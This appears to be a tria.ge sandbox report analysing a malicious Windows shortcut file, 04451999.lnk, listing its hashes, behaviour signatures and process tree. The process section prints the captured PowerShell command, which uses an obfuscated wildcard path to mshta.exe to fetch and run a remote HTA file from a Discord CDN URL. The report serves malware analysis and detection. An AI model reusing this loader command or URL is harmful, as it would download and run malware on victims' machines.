Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

04451999.lnk

windows7-x64

3

04451999.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    29/05/2023, 08:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    04451999.lnk

  • Size

    2KB

  • MD5

    594a86d0fa8711e48066b1852ad13ac6

  • SHA1

    35b840640e6a3c53a6ba0c6efa1a19a061f5c104

  • SHA256

    b49d777b48ec591859c9374a2a707b179cb3770b54d9dc03b5c7f3ae2f06b360

  • SHA512

    bc67e03c2a577c936c376b27cb141cb2f1e041a32dc4ebfa14c575289b3a15e5b27faec9e25f12caf9f00ada13b934c9adf348a2fef4d7202119f13880bf23ab

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\04451999.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://cdn.discordapp.com/attachments/952087079892975626/1108466607375786045/INVOICE_MT103.hta'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1904

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1904-92-0x000000001B150000-0x000000001B432000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1904-93-0x0000000002030000-0x0000000002038000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1904-94-0x0000000001F40000-0x0000000001FC0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1904-96-0x0000000001F4B000-0x0000000001F82000-memory.dmp

    Filesize

    220KB

    Download

  • memory/1904-95-0x0000000001F40000-0x0000000001FC0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1904-97-0x0000000001F40000-0x0000000001FC0000-memory.dmp

    Filesize

    512KB

    Download